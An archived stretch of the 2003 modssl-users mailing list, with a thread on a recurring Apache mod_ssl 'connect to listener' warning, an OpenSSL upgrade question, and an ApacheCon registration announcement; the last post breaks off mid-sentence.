X-X-Sender: jcw5q@cobra.cs.Virginia.EDU
To: Alex Hart 
Cc: modssl-users@modssl.org, dev@httpd.apache.org
Subject: Re: Apache warning: Connection refused: connect to listener
In-Reply-To: <200309300306.h8U36VSc004782@www.atpmail.com>
Message-ID: 
References: <200309300306.h8U36VSc004782@www.atpmail.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mon, 29 Sep 2003, Alex Hart wrote:

> I just installed Apache/2.0.47 (Unix) mod_ssl/2.0.47 OpenSSL/0.9.7b in
> my server (freebsd 4.8) and everything seems to be working fine. I have
> apache configured to serve both secure and insecure pages.
>
> However, I keep getting the following line in my error log file
> (thousands of times):
>
> [Wed Sep 24 12:51:15 2003] [warn] (61)Connection refused: connect to
> listener
>
> I have thousands of these warnings now in just a couple of days. I can't
> figure out any pattern to them. I get this warning even when I don't
> have any activity going on with the web server.  It also happens if I
> don't have any SSL virtual hosts set up. I notice no problems with any
> web pages, secure or not.
>
> When I recompile apache without mod_ssl, the warning goes away.
>
> I've scoured the Internet but I can't find a thing about this warning.
> Does anyone have any idea about why this is happening?


Okay, here's a couple of things for you to check on to help me track down
what's going on (I'm cc'ing dev@httpd in case anybody else has guesses).

 1) Is your server compiled with -D SINGLE_LISTEN_UNSERIALIZED_ACCEPT?
 2) Which MPM are you using?

    You can find out the answers to both of these by running ./httpd -V
    from /usr/local/apache2/bin or wherever your httpd binary is
    installed.  For example:

    ----------------------------------------------------
    root@deepthought:/root/apache/test/bin# ./httpd -V
    Server version: Apache/2.1.0-dev
    Server built:   Aug 12 2003 16:43:24
    Server's Module Magic Number: 20030213:1
    Architecture:   32-bit
    Server compiled with....
     -D APACHE_MPM_DIR="server/mpm/worker"
     -D APR_HAS_SENDFILE
     -D APR_HAS_MMAP
     -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled)
     -D APR_USE_SYSVSEM_SERIALIZE
     -D APR_USE_PTHREAD_SERIALIZE
     -D SINGLE_LISTEN_UNSERIALIZED_ACCEPT
     -D APR_HAS_OTHER_CHILD
     -D AP_HAVE_RELIABLE_PIPED_LOGS
     -D HTTPD_ROOT="/root/apache/test"
     -D SUEXEC_BIN="/root/apache/test/bin/suexec"
     -D DEFAULT_SCOREBOARD="logs/apache_runtime_status"
     -D DEFAULT_ERRORLOG="logs/error_log"
     -D AP_TYPES_CONFIG_FILE="conf/mime.types"
     -D SERVER_CONFIG_FILE="conf/httpd.conf"
    ----------------------------------------------------

Thanks,
Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep 30 10:33:09 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 61829A8940; Tue, 30 Sep 2003 10:33:09 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id 006FFA8936
	for ; Tue, 30 Sep 2003 10:32:52 +0200 (CEST)
Received: by toftum.dk (Postfix, from userid 1001)
	id CEF546E4013; Tue, 30 Sep 2003 10:32:42 +0200 (CEST)
Date: Tue, 30 Sep 2003 10:32:42 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Apache warning: Connection refused: connect to listener
Message-ID: <20030930083242.GA31412@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <200309300306.h8U36VSc004782@www.atpmail.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <200309300306.h8U36VSc004782@www.atpmail.com>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mon, Sep 29, 2003 at 11:06:31PM -0400, Alex Hart wrote:
> I just installed Apache/2.0.47 (Unix) mod_ssl/2.0.47 OpenSSL/0.9.7b in
> my server (freebsd 4.8) and everything seems to be working fine. I have apache
> configured to serve both secure and insecure pages.
> 
> However, I keep getting the following line in my error log file (thousands of times):
> 
> [Wed Sep 24 12:51:15 2003] [warn] (61)Connection refused: connect to listener
> 
> I have thousands of these warnings now in just a couple of days. I can't figure out any pattern to them.
> I get this warning even when I don't have any activity going on with the web server. 
> It also happens if I don't have any SSL virtual hosts set up.
> I notice no problems with any web pages, secure or not.
> 
We need a few more details to guess what might be happening - something like
the output of httpd -V, the configure options used when building apache and
wether you have any other non standard modules installed (ie. php and such).
Also your SSL specific part of the configuration.

vh

Mads Toftum
-- 
Speaking at http://ApacheCon.com/
T03, "Apache 2 mod_ssl tutorial" (3h)
WE03, "Troubleshooting Apache configurations" 
WE11, "Apache mod_rewrite, the Swiss Army Knife of URL manipulation" 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep 30 18:14:04 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9B617A8940; Tue, 30 Sep 2003 18:14:04 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from www.atpmail.com (atpmail.com [216.55.187.46])
	by master.modssl.org (Postfix) with ESMTP id 67421A8974
	for ; Tue, 30 Sep 2003 18:13:45 +0200 (CEST)
Received: from www.atpmail.com (atpmail.com [216.55.187.46])
	by www.atpmail.com (8.12.9/8.12.9) with ESMTP id h8UGDhZQ013103
	for ; Tue, 30 Sep 2003 09:13:43 -0700 (PDT)
Received: (from alex@localhost)
	by www.atpmail.com (8.12.9/8.12.9/Submit) id h8UGDgPT013094;
	Tue, 30 Sep 2003 09:13:42 -0700 (PDT)
Message-Id: <200309301613.h8UGDgPT013094@www.atpmail.com>
To: modssl-users@modssl.org
From: "Alex Hart" 
Subject: Re: Apache warning: Connection refused: connect to listener
Date: Tue, 30 Sep 2003 12:13:42 -0400
X-Mailer: "ATPmail, Version 5.20"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Alex Hart" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I sent this yesterday but never saw it, so sorry if this is double. Output of httpd -V at bottom.

- Alex

The following message was sent by Mads Toftum  on Tue, 30 Sep 2003 10:32:42 +0200.

> On Mon, Sep 29, 2003 at 11:06:31PM -0400, Alex Hart wrote:
> > I just installed Apache/2.0.47 (Unix) mod_ssl/2.0.47 OpenSSL/0.9.7b in
> > my server (freebsd 4.8) and everything seems to be working fine. I have 
> apache
> > configured to serve both secure and insecure pages.
> > 
> > However, I keep getting the following line in my error log file (thousands 
> of times):
> > 
> > [Wed Sep 24 12:51:15 2003] [warn] (61)Connection refused: connect to 
> listener
> > 
> > I have thousands of these warnings now in just a couple of days. I can't 
> figure out any pattern to them.
> > I get this warning even when I don't have any activity going on with 
> the web server. 
> > It also happens if I don't have any SSL virtual hosts set up.
> > I notice no problems with any web pages, secure or not.
> > 
> We need a few more details to guess what might be happening - something 
> like
> the output of httpd -V, the configure options used when building apache 
> and
> wether you have any other non standard modules installed (ie. php and such).
> Also your SSL specific part of the configuration.
> 
> vh
> 
> Mads Toftum
> -- 
> Speaking at http://ApacheCon.com/
> T03, "Apache 2 mod_ssl tutorial" (3h)
> WE03, "Troubleshooting Apache configurations" 
> WE11, "Apache mod_rewrite, the Swiss Army Knife of URL manipulation" 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> 

./httpd -V
Server version: Apache/2.0.47
Server built:   Sep 29 2003 18:29:13
Server's Module Magic Number: 20020903:4
Architecture:   32-bit
Server compiled with....
 -D APACHE_MPM_DIR="server/mpm/prefork"
 -D APR_HAS_SENDFILE
 -D APR_HAS_MMAP
 -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled)
 -D APR_USE_FLOCK_SERIALIZE
 -D SINGLE_LISTEN_UNSERIALIZED_ACCEPT
 -D APR_HAS_OTHER_CHILD
 -D AP_HAVE_RELIABLE_PIPED_LOGS
 -D HTTPD_ROOT="/usr/local/apache2"
 -D SUEXEC_BIN="/usr/local/apache2/bin/suexec"
 -D DEFAULT_PIDLOG="logs/httpd.pid"
 -D DEFAULT_SCOREBOARD="logs/apache_runtime_status"
 -D DEFAULT_LOCKFILE="logs/accept.lock"
 -D DEFAULT_ERRORLOG="logs/error_log"
 -D AP_TYPES_CONFIG_FILE="conf/mime.types"
 -D SERVER_CONFIG_FILE="conf/httpd.conf"

- Alex Hart
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep 30 18:19:45 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 55B1AA8940; Tue, 30 Sep 2003 18:19:45 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mhub.AXP.MDX.AC.UK (mhub.axp.mdx.ac.uk [158.94.254.14])
	by master.modssl.org (Postfix) with ESMTP id 387D1A8936
	for ; Tue, 30 Sep 2003 18:19:29 +0200 (CEST)
Received: from CONVERSION-DAEMON.mdx.ac.uk by mdx.ac.uk (PMDF V6.2-X17 #30724)
 id <01L1A7TNB6A800CXEK@mdx.ac.uk> for modssl-users@modssl.org; Tue,
 30 Sep 2003 17:19:08 +0100 (BST)
Received: from imhub1.uni.mdx.ac.uk ([10.13.83.21])
 by mdx.ac.uk (PMDF V6.2-X17 #30724)
 with ESMTP id <01L1A7TDV47000D7JU@mdx.ac.uk> for modssl-users@modssl.org; Tue,
 30 Sep 2003 17:18:44 +0100 (BST)
Received: from CONVERSION-DAEMON.mdx.ac.uk by mdx.ac.uk (PMDF V6.2-X17 #30840)
 id <01L1A7R576LS9ANN2B@mdx.ac.uk> for modssl-users@modssl.org; Tue,
 30 Sep 2003 17:16:55 +0100 (BST)
Received: from mdx-cpq-temp1.nw.mdx.ac.uk
 (mdx-cpq-temp1.mdx.ac.uk [10.13.75.36]) by mdx.ac.uk (PMDF V6.2-X17 #30840)
 with ESMTP id <01L1A7QZCC3Y9ANMMY@mdx.ac.uk> for modssl-users@modssl.org; Tue,
 30 Sep 2003 17:16:55 +0100 (BST)
Received: from MDX-CPQ-TEMP1/SpoolDir by mdx-cpq-temp1.nw.mdx.ac.uk
 (Mercury 1.48); Tue, 30 Sep 2003 17:09:56 +0000
Received: from SpoolDir by MDX-CPQ-TEMP1 (Mercury 1.48); Tue,
 30 Sep 2003 17:09:40 +0000
Date: Tue, 30 Sep 2003 17:08:58 +0000
From: a.moon@mdx.ac.uk
Subject: Re: Apache warning: Connection refused: connect to listener
To: modssl-users@modssl.org
Message-id: <6AD91935470@mdx-cpq-temp1.nw.mdx.ac.uk>
MIME-version: 1.0
Content-type: TEXT/PLAIN
Content-transfer-encoding: 7BIT
X-Autoreply-From: 
X-Comment: Middlesex University has scanned this message for viruses.
X-Comment: Middlesex University has scanned this message for viruses.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a.moon@mdx.ac.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am away until the 1st of October 2003.  
I will get back to you as soon as i can when I return.  
If the matter is urgent and concerns OASIS, MUBSWEB or MUBS Online 
then please contact one of the other members of the OLSU team.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  1 16:44:57 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B1EC4A8947; Wed,  1 Oct 2003 16:44:57 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from falcon.mail.pas.earthlink.net (falcon.mail.pas.earthlink.net [207.217.120.74])
	by master.modssl.org (Postfix) with ESMTP id BAE35A8934
	for ; Wed,  1 Oct 2003 16:44:40 +0200 (CEST)
Received: from ernie.psp.pas.earthlink.net ([207.217.78.243])
	by falcon.mail.pas.earthlink.net with esmtp (Exim 3.33 #1)
	id 1A4iDU-0000ba-00
	for modssl-users@modssl.org; Wed, 01 Oct 2003 07:44:36 -0700
Message-ID: <8070513.1065019476071.JavaMail.root@ernie.psp.pas.earthlink.net>
Date: Wed, 1 Oct 2003 07:44:36 -0700 (GMT-07:00)
From: rmck 
To: modssl-users@modssl.org
Subject: Upgrade Question
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Mailer: Earthlink Zoo Mail 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rmck 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I have an upgrade questions that I hope someone can help me with.  
I have mod_ssl-2.8.12-1.3.27 on solaris 8. I'm in the procees of upgrading openssl,
and then plan on moving to mod_ssl-2.8.15-1.3.28. 

1. For my current version of mod_ssl/apache will it break when I finsh the ssl upgrade??

2. Will i need to re-complie because of the new ssl version? ( I assume I will )

3. I also have a vaild cert from veriSign. Will I need to get an updated one when I'm done with the upgrades?

Thanks,
Rob
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  1 17:32:20 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 41352A8947; Wed,  1 Oct 2003 17:32:20 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from brunog1.spinweb.net (brunog1.spinweb.net [198.173.255.31])
	by master.modssl.org (Postfix) with ESMTP id 5ADEDA8934
	for ; Wed,  1 Oct 2003 17:32:03 +0200 (CEST)
Received: from xbridge.com (xbridgelimited-2.dsl.easynet.co.uk [212.135.187.146])
	(authenticated bits=0)
	by brunog1.spinweb.net (8.12.6p3/8.12.6) with ESMTP id h91FVQmw099257
	for ; Wed, 1 Oct 2003 15:31:59 GMT
	(envelope-from bruno@xbridge.com)
Date: Wed, 1 Oct 2003 16:31:15 +0100
Subject: Re: Upgrade Question
Content-Type: text/plain; charset=US-ASCII; format=flowed
Mime-Version: 1.0 (Apple Message framework v552)
From: Bruno Georges 
To: modssl-users@modssl.org
Content-Transfer-Encoding: 7bit
In-Reply-To: <8070513.1065019476071.JavaMail.root@ernie.psp.pas.earthlink.net>
Message-Id: <4BA64FC8-F424-11D7-BFED-000393A47BCC@xbridge.com>
X-Mailer: Apple Mail (2.552)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Bruno Georges 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Rob
You will need to recompile after you installed openssl, also you need 
to get apache 1.3.28.
First install openssl, then mod_ssl and apache . Openssl as a very good 
readme about the installation process.

You don't need to upgrade your  certificate .

Bruno
On Wednesday, Oct 1, 2003, at 15:44 Europe/London, rmck wrote:

> I have an upgrade questions that I hope someone can help me with.
> I have mod_ssl-2.8.12-1.3.27 on solaris 8. I'm in the procees of 
> upgrading openssl,
> and then plan on moving to mod_ssl-2.8.15-1.3.28.
>
> 1. For my current version of mod_ssl/apache will it break when I finsh 
> the ssl upgrade??
>
> 2. Will i need to re-complie because of the new ssl version? ( I 
> assume I will )
>
> 3. I also have a vaild cert from veriSign. Will I need to get an 
> updated one when I'm done with the upgrades?
>
> Thanks,
> Rob
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>
Bruno Georges
Xbridge Ltd
Tel: +44 (0) 207 378 9830
Mob: +44 (0) 787 988 4895

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  1 19:45:10 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 24F1AA8971; Wed,  1 Oct 2003 19:45:10 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from falcon.mail.pas.earthlink.net (falcon.mail.pas.earthlink.net [207.217.120.74])
	by master.modssl.org (Postfix) with ESMTP id 1F909A8934
	for ; Wed,  1 Oct 2003 19:44:51 +0200 (CEST)
Received: from ernie.psp.pas.earthlink.net ([207.217.78.243])
	by falcon.mail.pas.earthlink.net with esmtp (Exim 3.33 #1)
	id 1A4l1t-0004px-00
	for modssl-users@modssl.org; Wed, 01 Oct 2003 10:44:49 -0700
Message-ID: <12099894.1065030288987.JavaMail.root@ernie.psp.pas.earthlink.net>
Date: Wed, 1 Oct 2003 10:44:48 -0700 (GMT-07:00)
From: rmck 
To: modssl-users@modssl.org
Subject: Re: Upgrade Question
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Mailer: Earthlink Zoo Mail 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rmck 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Thank You!

-----Original Message-----
From: Bruno Georges 
Sent: Oct 1, 2003 8:31 AM
To: modssl-users@modssl.org
Subject: Re: Upgrade Question

Rob
You will need to recompile after you installed openssl, also you need 
to get apache 1.3.28.
First install openssl, then mod_ssl and apache . Openssl as a very good 
readme about the installation process.

You don't need to upgrade your  certificate .

Bruno
On Wednesday, Oct 1, 2003, at 15:44 Europe/London, rmck wrote:

> I have an upgrade questions that I hope someone can help me with.
> I have mod_ssl-2.8.12-1.3.27 on solaris 8. I'm in the procees of 
> upgrading openssl,
> and then plan on moving to mod_ssl-2.8.15-1.3.28.
>
> 1. For my current version of mod_ssl/apache will it break when I finsh 
> the ssl upgrade??
>
> 2. Will i need to re-complie because of the new ssl version? ( I 
> assume I will )
>
> 3. I also have a vaild cert from veriSign. Will I need to get an 
> updated one when I'm done with the upgrades?
>
> Thanks,
> Rob
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>
Bruno Georges
Xbridge Ltd
Tel: +44 (0) 207 378 9830
Mob: +44 (0) 787 988 4895

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct  2 16:50:32 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0E57FA8958; Thu,  2 Oct 2003 16:50:32 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id E9337A8935
	for ; Thu,  2 Oct 2003 16:50:15 +0200 (CEST)
Received: by toftum.dk (Postfix, from userid 1001)
	id 896516E4048; Thu,  2 Oct 2003 16:50:12 +0200 (CEST)
Date: Thu, 2 Oct 2003 16:50:12 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Apache warning: Connection refused: connect to listener
Message-ID: <20031002145012.GA9923@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <200309301613.h8UGDgPT013094@www.atpmail.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <200309301613.h8UGDgPT013094@www.atpmail.com>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, Sep 30, 2003 at 12:13:42PM -0400, Alex Hart wrote:
> I sent this yesterday but never saw it, so sorry if this is double. Output of httpd -V at bottom.
> 
> ./httpd -V
> Server version: Apache/2.0.47
> Server built:   Sep 29 2003 18:29:13
> Server's Module Magic Number: 20020903:4
> Architecture:   32-bit
> Server compiled with....
>  -D APACHE_MPM_DIR="server/mpm/prefork"
>  -D APR_HAS_SENDFILE
>  -D APR_HAS_MMAP
>  -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled)
>  -D APR_USE_FLOCK_SERIALIZE
>  -D SINGLE_LISTEN_UNSERIALIZED_ACCEPT

Right, this was part of what we needed - then there is the configuration.
Specifically there are two settings that might be worth taking a closer
look at - SSLMutex and SSLSessionCache. What are they currently set to?
and if you feel adventurous, try switching between different types.

http://httpd.apache.org/docs-2.0/mod/mod_ssl.html#sslmutex
http://httpd.apache.org/docs-2.0/mod/mod_ssl.html#sslsessioncache

vh

Mads Toftum
-- 
Speaking at ApacheCon 2003 - http://ApacheCon.com/
T03, "Apache 2 mod_ssl tutorial" (3h)
WE03, "Troubleshooting Apache configurations" 
WE11, "Apache mod_rewrite, the Swiss Army Knife of URL manipulation" 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct  2 17:07:01 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3B7F1A8958; Thu,  2 Oct 2003 17:07:01 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id 0766AA8935
	for ; Thu,  2 Oct 2003 17:06:45 +0200 (CEST)
Received: by toftum.dk (Postfix, from userid 1001)
	id BB08A6E4048; Thu,  2 Oct 2003 17:06:43 +0200 (CEST)
Date: Thu, 2 Oct 2003 17:06:43 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Registration Open for ApacheCon 2003
Message-ID: <20031002150643.GB9923@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="k1lZvvs/B4yU6o8G"
Content-Disposition: inline
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--k1lZvvs/B4yU6o8G
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

Looking back through the list archive, it appears that this 
message never got through to the list. (sorry if I missed it).

If there's enough interested mod_ssl users there, we could try 
setting up a mod_ssl BOF to discuss what has happened after 
the module became a part of the Apache distribution and where
we would like to see the module going in the future.
If you're interested, then drop me a note off list, and I'll
talk to the planners.

vh

Mads Toftum
-- 
Speaking at ApacheCon 2003 - http://ApacheCon.com/
T03, "Apache 2 mod_ssl tutorial" (3h)
WE03, "Troubleshooting Apache configurations" 
WE11, "Apache mod_rewrite, the Swiss Army Knife of URL manipulation" 

--k1lZvvs/B4yU6o8G
Content-Type: message/rfc822
Content-Disposition: inline

From: Joshua Slive 
To: announce@httpd.apache.org
Subject: Registration Opens for ApacheCon 2003
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N


http://www.marketwire.com/mw/release_html_b1?release_id=57498

Registration Opens for ApacheCon 2003, the Global Hub
for All Things Apache

(MARKET WIRE) -- 09/15/2003 --
http://www.apachecon.com/ -- ApacheCon, the official
conference of the Apache Software Foundation (ASF),
announced today the opening of registration for
ApacheCon 2003, to be held November 16-20, 2003 in Las
Vegas, Nevada.

Forward-thinking open source users, developers,
programmers, system administrators, and information
architects head to ApacheCon to master new
technologies, expand their knowledge and share
problem-solving skills with peers from across the
globe. Offering a wide range of beginner, intermediate
and advanced sessions, ApacheCon attendees will learn
firsthand the latest developments in Apache, the
world's most popular Web server software, as well as
key open source projects spanning PHP, Perl, XML,
Java, MySQL, WebDAV, and more. Debuting at ApacheCon
is code-named Geronimo, the ASF-licensed open source
implementation of the J2EE specification that builds
upon the many ASF-driven Java projects in liaison with
leading members of the Castor, JBoss, MX4J and OpenEJB
communities.

"We're proud to offer the opportunity to inspire,
educate, and interact with some of the industry's
sharpest minds," said ApacheCon 2003 Chairman Ken
Coar. "ApacheCon attendees are part of a collective
voice in providing input and feedback to the Apache
Software Foundation, thereby making a direct impact on
the Apache community."

More than 60 Sessions Highlight Core and
Next-Generation Apache Server Tools

ApacheCon kicks off with intensive full- and half-day
tutorials that offer real world insight, techniques,
and methodologies pivotal to the increasing demand for
open source software. Attendees hone their skills,
learn shortcuts and hacks and solve programming
challenges on a variety of topics, including Apache
2.0, Jakarta, PHP, Perl, and SVG.

This year's sessions highlight the dynamic nature of
open development, and are grouped into three Focus
Days: 1) Apache with XML and Java; 2) All Things
Apache; and 3) Apache with Perl and PHP. ApacheCon
presenters and faculty include some of the most
accomplished and respected leaders in the open source
community, such as Rich Bowen, Doug Tidwell, Stas
Bekman, Rasmus Lerdorf, Greg Stein, Stefano Mazzocchi,
and Geoffrey Young, along with keynote speakers Chris
Pirillo and Doc Searls.

Attendees can meet ASF members and peers during the
ApacheCon Expo, evening events, birds of a feather
sessions and a number of informal social gatherings.
Premier sponsors include the Java Community Process
(JCP), and Sun Microsystems who returns as a platinum
sponsor.

Once again ApacheCon is offering early registration
incentives, including a tiered discount of up to $400
off the $899 individual registration fee to those who
register by 30 September. The full conference
schedule, tutorial descriptions, sponsorship and
exhibitor opportunities, and venue details can be
found at the ApacheCon 2003 Website. Register today at
http://www.apachecon.com/ .

Press registration is now available; please contact
the ApacheCon Press Team on +1.617.921.8656 or via
email at press@apachecon.com.

About the Apache Software Foundation

The Apache Software Foundation provides
organizational, legal, and financial support for
world-class, Open Source, Java, Perl, XML, Tcl, and
PHP projects, in addition to the world's most popular
Web server. The membership driven, non-profit,
Foundation exists to ensure that the Apache projects
continue to exist beyond the contributions of
individuals, to enable contributions of intellectual
property and financial support, and to provide a
vehicle for limiting legal exposure while
participating in Open Source projects. For more
information, please see http://www.apache.org

------------------------------------------------------

Contact: Sally Khudairi
Company: Apache Software Foundation
Phone: 617-921-8656
Email: sk@apache.org


---------------------------------------------------------------------
To unsubscribe, e-mail: announce-unsubscribe@httpd.apache.org
For additional commands, e-mail: announce-help@httpd.apache.org

--k1lZvvs/B4yU6o8G--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct  3 01:54:27 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 80D16A8965; Fri,  3 Oct 2003 01:54:27 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from b.mail.peak.org (b.mail.peak.org [69.59.192.42])
	by master.modssl.org (Postfix) with ESMTP id 909B3A893B
	for ; Fri,  3 Oct 2003 01:54:26 +0200 (CEST)
Received: from peak.org (alliance.peak.org [206.163.129.30])
	(authenticated bits=0)
	by b.mail.peak.org (8.12.10/8.12.8) with ESMTP id h92NsOIi053526
	(version=TLSv1/SSLv3 cipher=DES-CBC3-SHA bits=168 verify=NO)
	for ; Thu, 2 Oct 2003 23:54:24 GMT
Date: Thu, 2 Oct 2003 16:54:24 -0700
Mime-Version: 1.0 (Apple Message framework v552)
Content-Type: text/plain; charset=US-ASCII; format=flowed
Subject: Problems with Random Number Seeding
From: Jeremy McDermond 
To: modssl-users@modssl.org
Content-Transfer-Encoding: 7bit
Message-Id: 
X-Mailer: Apple Mail (2.552)
X-Spam-Score: 0 () USER_AGENT_APPLEMAIL
X-Scanned-By: MIMEDefang 2.29 (www . roaringpenguin . com / mimedefang)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jeremy McDermond 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I'm not sure if this is an issue with mod_ssl, or possibly with 
OpenSSL's engine code itself.  I have a FreeBSD 5.1R box with a 
